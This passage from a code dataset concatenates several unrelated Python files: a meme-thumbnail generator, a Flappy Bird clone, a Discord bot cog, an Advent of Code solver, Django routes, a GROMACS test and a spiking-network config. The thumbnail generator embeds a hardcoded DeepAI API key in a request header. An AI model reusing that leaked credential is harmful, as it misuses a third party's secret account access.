def next_frame(self):\n if self.frames:\n self.config(image=next(self.frames))\n self.after(self.delay, self.next_frame)\n\nclass makingImage():\n def get_image(width, height):\n req = urlopen('https://picsum.photos/{}/{}'.format(width, height))\n arr = np.asarray(bytearray(req.read()), dtype=np.uint8)\n img = theEngine.imdecode(arr, -1) \n return img\n\n def crop_image(raw_img):\n global thumbnail_resolution\n #Crops the image to youtube thumbnail aspect ratio, centering the crop with the center of the image\n ideal_aspect_ratio = thumbnail_resolution[0] / thumbnail_resolution[1]\n\n orig_y = raw_img.shape[0]\n\n orig_x = raw_img.shape[1]\n\n aspect_ratio = round(orig_x / orig_y, 16)\n\n if aspect_ratio < ideal_aspect_ratio:\n print('Excess y pixels')\n new_y = int(orig_x / ideal_aspect_ratio)\n y_center = int(orig_y / 2)\n cropped_img = raw_img[y_center - int(new_y / 2):y_center + int(new_y / 2), 0:orig_x]\n\n elif aspect_ratio > ideal_aspect_ratio:\n print('Excess x pixels')\n new_x = int(orig_y * ideal_aspect_ratio)\n x_center = int(orig_x / 2)\n cropped_img = raw_img[0:orig_y, x_center - int(new_x / 2):x_center + int(new_x / 2)]\n else: \n print('Correct aspect ratio')\n cropped_img = raw_img\n\n print('New Res: ' + str(cropped_img.shape))\n print('Current Aspect Ratio: ' + str(cropped_img.shape[1] / cropped_img.shape[0]))\n cropped_img = theEngine.resize(cropped_img, thumbnail_resolution)\n\n return cropped_img\n\n\n def get_font_scale(text, width):\n for scale in reversed(range(0, 50, 1)):\n textSize = theEngine.getTextSize(text, fontFace=theEngine.FONT_HERSHEY_DUPLEX, fontScale=scale/10, thickness=1)\n new_width = textSize[0][0]\n if (new_width <= width):\n return scale/10, textSize[0][1]\n\n\n def generate_txt(raw_img, txt, circle_pos):\n x_length = raw_img.shape[1]\n txt_scale, txt_height = makingImage.get_font_scale(txt, x_length)\n if circle_pos[1] > raw_img.shape[0] / 2:\n pos = (0, txt_height + int(.07 * raw_img.shape[0]))\n else:\n pos = (0, + raw_img.shape[0] - int(.07 * raw_img.shape[0]))\n line_width = txt_scale * 3\n txted_img = theEngine.putText(raw_img, text, pos, theEngine.FONT_HERSHEY_DUPLEX, txt_scale, (0, 0 ,0), int(line_width * 4), theEngine.LINE_AA)\n txted_img = theEngine.putText(raw_img, text, pos, theEngine.FONT_HERSHEY_DUPLEX, txt_scale, (255, 255, 255), int(line_width), theEngine.LINE_AA)\n return txted_img\n\n def get_text(self):\n ender_list = ['', '!', '!!!', '?', '??', '!?', '!??', '..!', '...'] \n r = requests.post(\n \"https://api.deepai.org/api/text-generator\",\n files={\n 'text':'Kanye West fan account',\n },\n headers={'api-key': 'f55c37e9-7b66-48e2-9c76-041b3bf47c5d'}\n )\n raw_text = r.json()['output']\n print(raw_text)\n ender = ender_list[random.randint(0,len(ender_list) - 1)]\n words = raw_text.split(' ')\n word_count = random.randint(2,4)\n place_in_text = random.randint(0,len(words) - word_count)\n kept_words = []\n for word in range(place_in_text, place_in_text + word_count):\n kept_words.append(words[word].replace('\\n', ''))\n text = ' '.join(kept_words) + ender\n return text\n\n def get_kp(image):\n orb = theEngine.ORB_create()\n grayscale_image = theEngine.cvtColor(image, theEngine.COLOR_BGR2GRAY)\n kp = orb.detect(grayscale_image, None)\n kp, des = orb.compute(grayscale_image, kp)\n kp_locations = []\n for keypoint in kp:\n kp_locations.append((keypoint.pt[0], keypoint.pt[1]))\n return kp_locations\n\n def get_densest(points_list):\n points = np.array(points_list) #list of tuples with x and y value\n tree = spatial.KDTree(np.array(points))\n radius = 3.0\n neighbors = tree.query_ball_tree(tree, radius)\n neighbors_ordered = sorted(neighbors, key=len)\n dense_list = []\n for point in neighbors_ordered:\n dense_list.append(tuple(points[neighbors.index(point)]))\n return dense_list\n\n def draw_circle(image, position):\n radius = int(image.shape[1] / 10)\n thickness = int(image.shape[1] / 75)\n theEngine.circle(image, (int(position[0]), int(position[1])), radius, (0,0,255), thickness, lineType=theEngine.LINE_AA)\n return image\n\n \n def get_arrow_cords(image, circle_pos, circle_radius):\n closer_point_length = circle_radius + (.05 * image.shape[1])\n further_point_length = closer_point_length + (.3 * image.shape[1])\n angle = random.randint(0,360)\n print(angle)\n print(circle_pos)\n arrow_start = (int(circle_pos[0] + (further_point_length * np.sin(angle))),\n int(circle_pos[1] + (further_point_length * np.cos(angle))))\n arrow_stop = (int(circle_pos[0] + (closer_point_length * np.sin(angle))),\n int(circle_pos[1] + (closer_point_length * np.cos(angle))))\n return arrow_start, arrow_stop\n\n def draw_shapes(image, dense_list, numOfArrows):\n radius = int(image.shape[1] / 10)\n thickness = int(image.shape[1] / 75)\n arrows_drawn = 0\n temp_images = []\n while arrows_drawn < numOfArrows:\n image = theEngine.circle(image, (int(dense_list[arrows_drawn][0]), int(dense_list[arrows_drawn][1])), radius, (0,0,255), thickness, lineType=theEngine.LINE_AA)\n print('Drawn circle at:')\n print(dense_list[arrows_drawn])\n arrow_start = (-50, -50)\n while arrow_start[0] not in range(0, image.shape[1]) or arrow_start[1] not in range(image.shape[0]):\n arrow_start, arrow_stop = makingImage.get_arrow_cords(image, dense_list[arrows_drawn], radius)\n #image = theEngine.arrowedLine(image, arrow_start, arrow_stop, (0,0,255), int(image.shape[1] / 30), theEngine.LINE_AA, tipLength=(image.shape[1] / 2000))\n temp_images.append(theEngine.arrowedLine(image, arrow_start, arrow_stop, (0,0,255), int(image.shape[1] / 30), theEngine.LINE_AA, tipLength=(image.shape[1] / 2000)))\n \n arrows_drawn += 1\n iterate = len(temp_images)-1\n for i in range(iterate):\n currentItImage = image\n if i==0:\n currentItImage = temp_images[i]\n image = theEngine.bitwise_and(currentItImage,temp_images[1])\n if i>0:\n image = theEngine.bitwise_and(currentItImage,temp_images[i+1]) \n return image\n \n \n def runGIF(fileName,fileName2):\n lbl = ImageLabel(tab1)\n lbl2 = ImageLabel(tab1)\n lbl2.load(fileName2,False) \n lbl2.grid(row=0, column=3, pady=2)\n lbl.load(fileName,False)\n lbl.grid(row=0,column=1,pady=2)\n return\n \n def makeImage(self):\n \n makingImage.runGIF(\"frog_left.gif\",\"frog_right.gif\")\n print('working')\n global times\n global numOfArrows\n \n arrows = 1\n try:\n arrows = int(numOfArrows.get())\n except:\n print('')\n pass\n \n text = makingImage.get_text()\n saveBtn = Button (tab1, text = \"Save the Image Bro\", command = makingImage.saveFile, width = 20)\n saveBtn.grid(row=4,column=2,pady=2)\n if times >0:\n label.config(image='') \n saveBtn.destroy() \n label.grid(row=0, column=1, pady=2)\n \n img = makingImage.get_image(thumbnail_resolution[0], thumbnail_resolution[1])\n\n cropped_img = makingImage.crop_image(img)\n \n\n densest = makingImage.get_densest(makingImage.get_kp(cropped_img))\n print('Densest Point is at: ' + str(densest))\n circled_img = makingImage.draw_shapes(cropped_img, densest,arrows)\n \n \n x_length = circled_img.shape[1]\n txt_scale, txt_height = makingImage.get_font_scale(text, x_length)\n if densest[0][1] > circled_img.shape[0] / 2:\n pos = (0, txt_height + int(.07 * circled_img.shape[0]))\n else:\n pos = (0, + circled_img.shape[0] - int(.07 * circled_img.shape[0]))\n line_width = txt_scale * 3\n txted_img = theEngine.putText(circled_img, text, pos, theEngine.FONT_HERSHEY_DUPLEX, txt_scale, (0, 0 ,0), int(line_width * 4), theEngine.LINE_AA)\n txted_img = theEngine.putText(circled_img, text, pos, theEngine.FONT_HERSHEY_DUPLEX, txt_scale, (255, 255, 255), int(line_width), theEngine.LINE_AA)\n \n \n blue,green,red = theEngine.split(txted_img)\n firstStep = theEngine.merge((red,green,blue))\n secondStep= Image.fromarray(firstStep)\n global saveImage \n saveImage= secondStep\n imageFin = ImageTk.PhotoImage(image = secondStep)\n label.config(image=imageFin)\n \n label.grid(row=0, column=2, pady=2)\n times+=1\n tab1.config(bg='blue')\n btn.grid(row=5,column=2,pady=2)\n app.mainloop()\n \n \n def saveFile(self):\n filename = filedialog.asksaveasfile(mode='w', defaultextension=\".jpg\")\n global saveImage\n if not filename:\n return\n saveImage.save(filename)\n \n \n \n\nif __name__ == '__main__':\n \n btn = Button(tab1, text = \"Generate Da Meme\", command = makingImage.makeImage,width=20)\n btn.grid(row=4,column=2,pady=2)\n openBtn = Button(tab2,text = \"Upload Image\",command= userInput.gifTab2)\n openBtn.grid(row=6, column =2, pady=2)\n app.mainloop()\n\n\n\n\n\n\n\n \n\n\n","repo_name":"eeden2/YouTube-Thumbnail-Generator","sub_path":"Thumbnail.py","file_name":"Thumbnail.py","file_ext":"py","file_size_in_byte":16603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"5183221414","text":"import pygame\nfrom Sprites.background import Background\nfrom Sprites.bird import Bird\nfrom Sprites.ground import Ground\nfrom Sprites.pipe import Pipe\nfrom settings import BLACK, FPS, GAP, HEIGHT, WHITE, WIDTH\n\nclass Game:\n def __init__(self):\n # Setup\n pygame.init()\n self.surface = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption('Flappy Bird')\n self.clock = pygame.time.Clock()\n self.font = pygame.font.Font('assets/fonts/FB.woff', 50)\n\n # Sprites\n self.background = pygame.sprite.GroupSingle(Background())\n self.ground = pygame.sprite.GroupSingle(Ground())\n self.bird = pygame.sprite.GroupSingle(Bird())\n self.pipes = []\n self.scored_pipes = []\n\n self.pipes.append(Pipe(2 * WIDTH))\n\n # Helpers\n self.state = 'menu'\n self.started = False\n self.score = 0\n\n def draw_score(self):\n score = str(self.score)\n score_surface = self.font.render(score, False, WHITE, BLACK)\n self.surface.blit(score_surface, ((WIDTH - score_surface.get_width()) // 2, 20))\n\n def run(self):\n running = True\n while running:\n dt = self.clock.tick_busy_loop(FPS) / 1000\n\n self.background.draw(self.surface)\n\n\n if self.state == 'playing':\n for pipe in self.pipes:\n for bird in self.bird.sprites():\n if pipe.collide(bird):\n self.__init__()\n elif bird.rect.right >= pipe.bottom_rect.x + 20 and pipe not in self.scored_pipes:\n if bird.rect.top > 0:\n self.score += 1\n self.scored_pipes.append(pipe)\n else:\n self.__init__()\n pipe.update(dt, self.pipes)\n pipe.draw(self.surface)\n \n for pipe in self.pipes:\n if pipe.bottom_rect.x >= GAP - 2 and pipe.bottom_rect.x <= GAP:\n self.pipes.append(Pipe(WIDTH))\n break\n\n events = pygame.event.get()\n for event in events:\n if ((event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE) or (event.type == pygame.MOUSEBUTTONDOWN and pygame.mouse.get_pressed()[0])) and not self.started:\n self.started = True\n self.state = 'playing'\n if event.type == pygame.QUIT:\n running = False\n\n self.draw_score()\n\n self.ground.update(dt)\n self.bird.update(dt, self.state)\n \n self.ground.draw(self.surface)\n self.bird.draw(self.surface)\n\n if pygame.sprite.groupcollide(self.bird, self.ground, False, False):\n self.__init__()\n\n pygame.display.update()\n \n pygame.quit()\n\ndef main():\n game = Game()\n game.run()\n\nif __name__=='__main__':\n main()","repo_name":"CHAKHVA/flappy-bird-clone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"262442159","text":"class OwnError(Exception):\n def __init__(self, txt):\n self.txt = txt\n\n\nnum_input = []\n\nwhile True:\n num = input('Введите число: ')\n if num == 'stop':\n break\n try:\n if num.isdigit():\n num_input.append(int(num))\n else:\n raise OwnError(f'{num} не является числом!')\n except OwnError as err:\n print(err)\n\nprint(num_input)\n","repo_name":"stepankrylov/Home_Work_8","sub_path":"Home_Work_8(3).py","file_name":"Home_Work_8(3).py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"7262080484","text":"import discord\nfrom discord.ext import commands\nfrom pussybot import bot, PATCHNOTES\n\nclass General(commands.Cog):\n def __init__(self, bot): self.bot = bot\n \n @commands.command(name=\"ping\", brief=\"Ping the bot and get the latency\")\n async def ping(self, ctx): await ctx.send(f\"Pong! `{round(bot.latency * 1000)}ms`\")\n \n @commands.command(name=\"patchnotes\", brief=\"Get the latest patchnotes\")\n async def patchnotes(self, ctx): \n embed = discord.Embed(title=\"Patch notes\", description=f\"```ini\\n{PATCHNOTES}```\", color=0x8E72BE)\n await ctx.send(embed=embed)\n \ndef setup(bot): bot.add_cog(General(bot))","repo_name":"adenviney/pussybot","sub_path":"ext/General.py","file_name":"General.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"40009669561","text":"from biobb_common.tools import test_fixtures as fx\nfrom biobb_gromacs.gromacs.pdb2gmx import pdb2gmx\nimport pytest\n\n\nclass TestPdb2gmxSingularity:\n def setup_class(self):\n fx.test_setup(self, 'pdb2gmx_singularity')\n\n def teardown_class(self):\n # pass\n fx.test_teardown(self)\n\n @pytest.mark.skip(reason=\"singularity currently not available\")\n def test_pdb2gmx_singularity(self):\n returncode = pdb2gmx(properties=self.properties, **self.paths)\n assert fx.not_empty(self.paths['output_top_zip_path'])\n assert fx.equal(self.paths['output_top_zip_path'], self.paths['ref_output_top_zip_path'])\n assert fx.not_empty(self.paths['output_gro_path'])\n assert fx.equal(self.paths['output_gro_path'], self.paths['ref_output_gro_path'])\n assert fx.exe_success(returncode)\n","repo_name":"bioexcel/biobb_gromacs","sub_path":"biobb_gromacs/test/unitests/test_gromacs/test_pdb2gmx_singularity.py","file_name":"test_pdb2gmx_singularity.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"8026150777","text":"import doctest\nfrom collections import defaultdict, namedtuple\n\nTOP = 0\nRIGHT = 1\nBOTTOM = 2\nLEFT = 3\n\nPOSSIBLE_ROTATIONS = [(r, f) for f in [False, True] for r in range(4)]\n\nSNEK = \"\"\"\n # \n# ## ## ###\n # # # # # # \n\"\"\"[1:-1].split('\\n')\n\n\nclass Tile:\n def __init__(self):\n self.lines = []\n self.top = ''\n self.right = ''\n self.bottom = ''\n self.left = ''\n\n def add_line(self, line):\n self.lines.append(line)\n if not self.top:\n self.top = line\n self.left += line[0]\n self.right += line[-1]\n self.bottom = line\n\n def sides(self, rotate=0, flip=False):\n if flip:\n s = (self.top[::-1], self.left, self.bottom[::-1], self.right)\n else:\n s = (self.top, self.right, self.bottom, self.left)\n for _ in range(rotate):\n s = (s[LEFT][::-1], s[TOP], s[RIGHT][::-1], s[BOTTOM])\n return s\n\n\ndef flip_lines(lines: list[str]):\n \"\"\"\n >>> flip_lines(['ab', 'cd'])\n ['ba', 'dc']\n \"\"\"\n return [line[::-1] for line in lines]\n\n\ndef rotate_lines(lines: list[str], rotate):\n \"\"\"\n >>> rotate_lines(['ab', 'cd'], 1)\n ['ca', 'db']\n >>> rotate_lines(['abc', 'def'], 1)\n ['da', 'eb', 'fc']\n \"\"\"\n if rotate >= 2:\n rotate -= 2\n lines = [line[::-1] for line in reversed(lines)]\n if rotate >= 1:\n rotate -= 1\n lines = [''.join(lines[x][y] for x in range(len(lines)))[::-1] for y in range(len(lines[0]))]\n return lines\n\n\nclass Assignment(namedtuple('Assignment', ['tile', 'rotate', 'flip'])):\n def sides(self, tiles: dict[int, Tile]):\n return tiles[self.tile].sides(self.rotate, self.flip)\n\n def content(self, tiles: dict[int, Tile]):\n tile = tiles[self.tile]\n lines = [line[1:-1] for line in tile.lines[1:-1]]\n if self.flip:\n lines = flip_lines(lines)\n return rotate_lines(lines, self.rotate)\n\n\ndef categorize_tiles(tiles: dict[int, Tile]):\n options = defaultdict(set)\n for id, tile in tiles.items():\n for side in tile.sides():\n options[side].add(id)\n options[side[::-1]].add(id)\n\n outside = defaultdict(int)\n for ids in options.values():\n if len(ids) < 2:\n outside[next(iter(ids))] += 1\n\n corners = {id for id, n in outside.items() if n == 4}\n assert len(corners) == 4\n edges = {id for id, n in outside.items() if n == 2}\n assert len(edges) == 40\n middle = set(tiles.keys()) - corners - edges\n assert len(middle) == 100\n\n return options, corners, edges, middle\n\n\ndef part1(tiles: dict[int, Tile]):\n options, corners, edges, middle = categorize_tiles(tiles)\n print(corners)\n prod = 1\n for c in corners:\n prod *= c\n print(prod)\n\n\ndef part2(tiles: dict[int, Tile]):\n options, corners, edges, middle = categorize_tiles(tiles)\n\n def tile_options_at(k: complex):\n if k in (0, 11, 0 + 11j, 11 + 11j):\n return corners\n if k.real == 0 or k.real == 11 or k.imag == 0 or k.imag == 11:\n return edges\n return middle\n\n def assignment_options_at(board: dict[complex, Assignment], k: complex):\n possible_tiles = tile_options_at(k) - {a.tile for a in board.values()}\n required_top = None\n required_left = None\n if k.imag > 0:\n required_top = board[k - 1j].sides(tiles)[BOTTOM]\n possible_tiles &= options[required_top]\n if k.real > 0:\n required_left = board[k - 1].sides(tiles)[RIGHT]\n possible_tiles &= options[required_left]\n for tile in possible_tiles:\n for r, f in POSSIBLE_ROTATIONS:\n a = Assignment(tile, r, f)\n sides = a.sides(tiles)\n if required_top and sides[TOP] != required_top:\n continue\n if required_left and sides[LEFT] != required_left:\n continue\n yield a\n\n indexes = [x + y * 1j for y in range(12) for x in range(12)]\n\n def assign_all(board: dict[complex, Assignment], at: int):\n if at == len(indexes):\n return board\n k = indexes[at]\n for ao in assignment_options_at(board, k):\n new_board = board.copy()\n new_board[k] = ao\n result = assign_all(new_board, at + 1)\n if result:\n return result\n\n solved = assign_all(dict(), 0)\n content = dict()\n for k, a in solved.items():\n tile_content = a.content(tiles)\n assert len(tile_content) == 8\n for y, tile_row in enumerate(tile_content):\n for x, v in enumerate(tile_row):\n ck = (8 * k) + y * 1j + x\n content[ck] = v\n\n found = False\n for r, f in POSSIBLE_ROTATIONS:\n lines = SNEK\n if f:\n lines = flip_lines(lines)\n lines = rotate_lines(lines, r)\n snek = {x + y * 1j for y in range(len(lines)) for x in range(len(lines[0])) if lines[y][x] == '#'}\n\n for y in range(96):\n for x in range(96):\n if all(content.get(x + y * 1j + c, None) == '#' for c in snek):\n found = True\n for c in snek:\n content[x + y * 1j + c] = 'O'\n if found:\n break\n\n for y in range(96):\n print(''.join(content[x + y * 1j] for x in range(96)))\n print(sum(1 for v in content.values() if v == '#'))\n\n\ndef main():\n tiles = dict()\n with open('day20_input.txt') as file:\n for line in file:\n line = line.strip()\n if not line:\n pass\n elif line.startswith('Tile '):\n id = int(line[5:-1])\n tile = Tile()\n tiles[id] = tile\n else:\n tile.add_line(line)\n\n part1(tiles)\n part2(tiles)\n\n\nif __name__ == \"__main__\":\n doctest.testmod()\n main()\n","repo_name":"nigelzor/advent-of-code","sub_path":"2020/day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"29773417939","text":"from django.urls import path,include\nfrom django.contrib.auth.decorators import login_required\n\nfrom .views import *\n\napp_name = 'product'\n\nurlpatterns = [\n path('',login_required(ProductListView.as_view()),name='listing'), \n path('add/',login_required(ProductCreateView.as_view()),name='add'), \n path('stock/',login_required(StockListView.as_view()),name='stock_listing'), \n path('stock/add/',login_required(StockCreateView.as_view()),name='stock_add'), \n]\n\n ","repo_name":"kevtheprogrammer/sodakings","sub_path":"product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"35597714656","text":"import numpy as np\nimport os\n\nGENN = 'genn'\nSPINNAKER = 'spinnaker'\n\nDEBUG = bool(0)\nONE_TO_ONE_EXCEPTION = bool(0)\nBACKEND = 'SingleThreadedCPU' if bool(0) else 'CUDA'\n\nINF = float(10e10)\n\n#SEED = 7\nSEED = None\nRNG = np.random.RandomState(seed=SEED)\n\n\nUSE_GABOR_LAYER = bool(0)\n\nSIM_NAME = GENN\n\nif SIM_NAME == GENN:\n from pynn_genn.random import NativeRNG, NumpyRNG\n NP_RNG = NumpyRNG(seed=SEED)\n NATIVE_RNG = NativeRNG(NP_RNG, seed=SEED)\n\nelse:\n NP_RNG = RNG\n NATIVE_RNG = RNG\n\n\nGPU_ID = 0\nUSE_PROCEDURAL = bool(0)\n\nTIMESTEP = 0.10 #ms\nSAMPLE_DT = 50.0 #ms\nSAMPLE_OFFSET = 10. # ms\nSAMPLE_MAX_T = SAMPLE_OFFSET + 5. # ms\n# iw = 28\niw = 32\n# iw = 48\n# iw = 56\n# iw = 64\n# iw = 105\nINPUT_SHAPE = (iw, iw)\nINPUT_DIVS = (3, 5)\n# INPUT_DIVS = (3, 3)\n# INPUT_DIVS = (2, 2)\n# INPUT_DIVS = (1, 1)\n# INPUT_DIVS = (2, 3)\nN_CLASSES = 14 if DEBUG else 3\nN_SAMPLES = 14 if DEBUG else 14\nN_EPOCHS = 10 if DEBUG else 5\nN_TEST = 6 if DEBUG else 6\nTOTAL_SAMPLES = N_SAMPLES * N_EPOCHS + N_TEST\nDURATION = N_CLASSES * TOTAL_SAMPLES * SAMPLE_DT\nPROB_NOISE_SAMPLE = 0.0#5\nSTEPS = 1 if SIM_NAME == GENN else 100\n\n\nTEST_MUSHROOM = bool(0)\nGAIN_CONTROL = bool(1)\nINH_INPUT = bool(1)\nSUPERVISION = bool(1) and (not TEST_MUSHROOM) \n\nSUP_DELAY = 5 # ms\nSUP_DURATION = 15 # ms\nSUP_CORRECT_AMPLITUDE = 1. # nA ?\nSUP_WRONG_AMPLITUDE = -0.2 # nA ?\n\nKERNEL_W = 7\nN_INPUT_LAYERS = 4\nPAD = KERNEL_W//2\nPI_DIVS_RANGE = (6, 7) if DEBUG else (2, 7)\nSTRIDE_RANGE = (2, 3) if DEBUG else (1, KERNEL_W//2 + 1)\nOMEGA_RANGE = (0.5, 1.0)\n\nif ONE_TO_ONE_EXCEPTION:\n EXPANSION_RANGE = (1., 1.0000000000000000000001)\nelse:\n # EXPANSION_RANGE = (10., 10.0001) if DEBUG else (0.25, 11.0)\n EXPANSION_RANGE = (20., 21.0) if DEBUG else (10, )#(5, 40)\n\n\nEXP_PROB_RANGE = (0.5, 0.75000001) if DEBUG else (3,)# 65)#0.025, 0.25)\n\nMUSH_MAX = 3.2 #/ float(EXP_PROB_RANGE[0])\n\nif ONE_TO_ONE_EXCEPTION:\n MUSHROOM_WEIGHT_RANGE = (5.0, 5.0000000001)\nelse:\n MUSHROOM_WEIGHT_RANGE = (1.0, 5.0000001) if DEBUG else (1., MUSH_MAX)\n# MUSHROOM_WEIGHT_RANGE = (0.50, 0.500000001) if DEBUG else (0.05, 1.0)\n# MUSHROOM_WEIGHT_RANGE = (0.025, 0.02500001) if DEBUG else (0.05, 1.0) ### for (64,64)\n\nMAX_PRE_OUTPUT = 40000\n\nOUTPUT_PROB_RANGE = (0.5, 0.750000001) if DEBUG else (0.01, )#0.5)\n# OUT_WEIGHT_RANGE = (0.1, 0.100000001) if DEBUG else (1.0, 5.0)\nif ONE_TO_ONE_EXCEPTION:\n OUT_WEIGHT_RANGE = (0.1, 0.1000000001)\nelse:\n OUT_WEIGHT_RANGE = (2.0, 5.000000001) if DEBUG else (0.1, 1.2)# (0.01, 0.5)\n# OUT_WEIGHT_RANGE = (1.5, 1.500001) if DEBUG else (0.01, 0.5) ### 64x64\n\n\nA_PLUS = (0.1, 5.0000000001) if DEBUG else (0.001, 1.0)\nA_MINUS = (0.1, 1.000000001) if DEBUG else (0.001, 1.0)\nCONN_DIST = (5, 15) if DEBUG else (1,)# 16)#(1, 15)\n\n\nSTD_DEV = (3.0, 3.00000001) if DEBUG else (0.5, 5.0)\nDISPLACE = (0.0,)#01, 0.00100000001) if DEBUG else (0.0001, 0.1)\nMAX_DT = (80.0, 80.00000001) if DEBUG else (float(SAMPLE_DT), SAMPLE_DT*2.0)\nW_MIN_MULT = (0.0, 0.00000001) if DEBUG else (0.00, )#(-1, 1)\nW_MAX_MULT = (1.,)# 1.200000001) if DEBUG else (0.1, 2.0\n\n\nGABOR_WEIGHT_RANGE = (2.0, 5.000001) if DEBUG else (1.0, 5.0)\n\nGAIN_CONTROL_SIZE = 20\nGAIN_CONTROL_MIN_W = 0.\nGAIN_CONTROL_MAX_W = 0.250000000000008#0000#1\nGAIN_CONTROL_INH_W = -0.10000\nGAIN_CONTROL_CUTOFF = 15\n\n\nNOISE_MUSHROOM_SIZE = 20\nNOISE_MUSHROOM_RATE = 50\nNOISE_MUSHROOM_WEIGHT = 0.01\nNOISE_MUSHROOM_PROB = 0.0\n\n###############\n# if ONE_TO_ONE_EXCEPTION:\n# EXPANSION_RANGE = (1., 1.0000000000000000000001)\n# else:\n# # EXPANSION_RANGE = (10., 10.0001) if DEBUG else (0.25, 11.0)\n# EXPANSION_RANGE = (0.25, 0.25) if DEBUG else (0.25, 11.0)\n#\n# EXP_PROB_RANGE = (0.15, 0.15000001) if DEBUG else (0.05, 0.3)\n# OUTPUT_PROB_RANGE = (0.15, 0.150000001) if DEBUG else (0.05, 0.3)\n# A_PLUS = (2.0, 2.0000000001) if DEBUG else (0.01, 5.0)\n# A_MINUS = (1.0, 1.000000001) if DEBUG else (0.001, 1.0)\n# STD_DEV = (3.0, 3.00000001) if DEBUG else (0.5, 5.0)\n# DISPLACE = (0.0,)#01, 0.00100000001) if DEBUG else (0.0001, 0.1)\n# MAX_DT = (80.0, 80.00000001) if DEBUG else (float(SAMPLE_DT), SAMPLE_DT*2.0)\n# W_MIN_MULT = (0.0, 0.00000001) if DEBUG else (-2.0, 0.0)\n# W_MAX_MULT = (1.2,)# 1.200000001) if DEBUG else (0.1, 2.0)\n# CONN_DIST = (10, 11) if DEBUG else (3, 25)\n#\n#\n# GABOR_WEIGHT_RANGE = (2.0, 2.000001) if DEBUG else (1.0, 5.0)\n#\n# # OUT_WEIGHT_RANGE = (0.1, 0.100000001) if DEBUG else (1.0, 5.0)\n# if ONE_TO_ONE_EXCEPTION:\n# OUT_WEIGHT_RANGE = (0.1, 0.1000000001)\n# else:\n# OUT_WEIGHT_RANGE = (2.0, 2.000000001) if DEBUG else (0.5, 5.0)\n# # OUT_WEIGHT_RANGE = (1.5, 1.500001) if DEBUG else (0.01, 0.5) ### 64x64\n#\n# if ONE_TO_ONE_EXCEPTION:\n# MUSHROOM_WEIGHT_RANGE = (5.0, 5.0000000001)\n# else:\n# MUSHROOM_WEIGHT_RANGE = (1.0, 1.0000001) if DEBUG else (1.0, 5.0)\n# # MUSHROOM_WEIGHT_RANGE = (0.50, 0.500000001) if DEBUG else (0.05, 1.0)\n# # MUSHROOM_WEIGHT_RANGE = (0.025, 0.02500001) if DEBUG else (0.05, 1.0) ### for (64,64)\n###############\n\n\n#################################################################\n# WEIGHTS FOR FITNESS #\n#################################################################\n\nif SUPERVISION:\n N_PER_CLASS = 1\nelse:\n N_PER_CLASS = 50\n\nOUTPUT_SIZE = N_CLASSES * N_PER_CLASS\nMAX_ACTIVE_PER_CLASS = int(OUTPUT_SIZE / 0.5)\nACTIVITY_THRESHOLD = 0.5 * OUTPUT_SIZE\nMAX_VECTOR_DIST = 100.0\nABOVE_THRESH_W = 1.0 / N_CLASSES\n\nTARGET_ACTIVITY_PER_SAMPLE = np.round(OUTPUT_SIZE * 0.05)\nTARGET_FREQUENCY_PER_OUTPUT_NEURON = np.round(N_TEST * 1.5)\n\nOVERLAP_WEIGHT = 0.3\nREPRESENTATION_WEIGHT = 0.4\nDIFFERENT_CLASS_DISTANCE_WEIGHT = 0.2\nSAME_CLASS_DISTANCE_WEIGHT = 0.\n\n\n# CONN_DIST = 3\n# CONN_DIST = 9\n# CONN_DIST = 15\n# CONN_ANGS = 9\n# CONN_RADII = [3, ]\n\n### static weights\n# gabor_weight = [1.0, 1.0, 2.0, 2.0]\n# mushroom_weight = 0.25\nINHIBITORY_WEIGHT = {\n 'gabor': -5.0,\n 'mushroom': -(0.5 if USE_PROCEDURAL else 0.5),\n 'output': -0.01,\n}\n\nN_INH_PER_ZONE = 3\n\nN_INH_OUTPUT = 5 # int( 0.25 * N_PER_CLASS * N_CLASSES )\n\nEXCITATORY_WEIGHT = {\n 'gabor': 3.0,\n 'mushroom': 5.0,\n 'output': 5.0,\n}\nMUSH_SELF_PROB = 0.0075\n\nATTRS = [\n 'out_weight',\n # 'n_pi_divs', 'stride', 'omega',\n 'expand', 'exp_prob', 'out_prob',\n 'mushroom_weight'\n]\n# ATTRS += ['gabor_weight-%d'%i for i in range(N_INPUT_LAYERS)]\n\nN_ATTRS = len(ATTRS)\n\nATTR2IDX = {attr: i for i, attr in enumerate(ATTRS)}\n\nATTR_RANGES = {\n 'out_weight': OUT_WEIGHT_RANGE,\n 'mushroom_weight': MUSHROOM_WEIGHT_RANGE,\n 'expand': EXPANSION_RANGE,\n 'exp_prob': EXP_PROB_RANGE,\n 'out_prob': OUTPUT_PROB_RANGE,\n 'conn_dist': CONN_DIST,\n\n 'A_plus': A_PLUS,\n 'A_minus': A_MINUS,\n # 'std': STD_DEV,\n # 'displace': DISPLACE,\n # 'maxDt': MAX_DT,\n 'w_max_mult': W_MAX_MULT,\n 'w_min_mult': W_MIN_MULT,\n\n}\nATTR_STEPS_DEVS = {\n 'out_weight': 1.0,\n 'mushroom_weight': 1.0,\n 'expand': 1.0,\n 'exp_prob': 1.0,\n 'out_prob': 1.0,\n 'A_plus': 1.0,\n 'A_minus': 1.0,\n 'std': 1.0,\n 'displace': 1.0,\n 'maxDt': 1.0,\n 'w_max_mult': 1.0,\n 'w_min_mult': 1.0,\n 'conn_dist': 1.0,\n}\n# ATTR_STEPS_BASE = {\n# 'out_weight': 1.0,\n# 'mushroom_weight': 1.0,\n# 'expand': 5.0,\n# 'exp_prob': 0.05,\n# 'out_prob': 0.05,\n# 